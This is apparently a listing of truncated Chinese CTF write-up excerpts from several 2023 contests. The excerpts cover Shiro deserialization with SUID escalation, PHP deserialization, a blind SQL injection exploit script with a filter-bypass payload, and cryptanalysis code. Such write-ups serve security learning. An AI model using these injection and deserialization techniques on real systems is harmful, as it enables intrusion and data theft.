参考： NepCTF 2023 Web WriteUp | Boogiepop Doesn’t Laugh (boogipop.com) 官方wp web ez_java_checkin 存在shiro反序列化漏洞，爆破密钥和利用链 flag只有写权限 suid提权，读取/flag 独步天下-转生

ctf部分wp，电子取证做不了一点 2023第七届蓝帽杯全国大学生网络安全技能大赛电子取证参考题解 (qq.com) Web LovePHP <?php class Saferman{ public $check = True; public function __destruct(){ if($this->check === True){ file($_GET['secret']); } } public function __wakeup(){

参考： 2023年“羊城杯”网络安全大赛 WP (qq.com) 羊城杯 2023 Writeup - 星盟安全团队 (xmcve.com) Web D0n’t pl4y g4m3!!! hint.zip 内有 hint.txt，解密 /tmp/catcatf1ag.txt PHP＜=7.4.21 Development Serve

参考：2023DASCTF&0X401 WriteUp Crypto ezDHKE DH秘钥交换算法 from Crypto.Util.number import * from Crypto.Cipher import AES from hashlib import sha256 from random import randbytes, getrandbits from flag import flag def diffie_hellman(g, p, flag): alice = getrandbits(1024) bob = getrandbits(1024) alice_c = pow(g, alice, p)

参考： https://mp.weixin.qq.com/s/DvRYMkFSr9SFqt_M0f8umg https://mp.weixin.qq.com/s/gOkixXbYSUewUlhd82CkeQ https://fq6p9pyo5tt.feishu.cn/docx/PPG0dCRT4oPLGOxotaicGSKonsc Web hellosql 过滤 sleep, benchmark, union, if, * 笛卡尔积造成延时 exp.py import requests import string import time url = "http://web-c4a5345842.challenge.xctf.org.cn:80/" flag = "" for i in range(1,100) : time.sleep(0.1) low = 32 high = 127 mid = (low + high) // 2 while (low < high): payload = "' or case when ascii(substr((select(group_concat(Flagg)) from ctf.Flllag), {}, 1))

参考： https://mp.weixin.qq.com/s/Gi3dQ3mDs3mZCRGtT4l_dg https://mp.weixin.qq.com/s/azbY19cBgs3MgVdo7i-OhQ crypto signin 256bit连分数逼近data3得到data1和data2 data3 = 1.42870767357206600351348423521722279489230609801270854618388981989800006431663026299563973511233193052826781891445323183272867949279044062899046090636843802841647378505716932999588 cf = continued_fraction(data3) alist = cf.convergents() for i in alist: a = str(i).split('/') if len(a)>1 and gcd(int(a[0]),int(a[1])) == 1 and is_prime(int(a[0])) and is_prime(int(a[1])) and int(a[0]).bit_length()==256 and int(a[1]).bit_length()==256: print(a) #data1 = 97093002077798295469816641595207740909547364338742117628537014186754830773717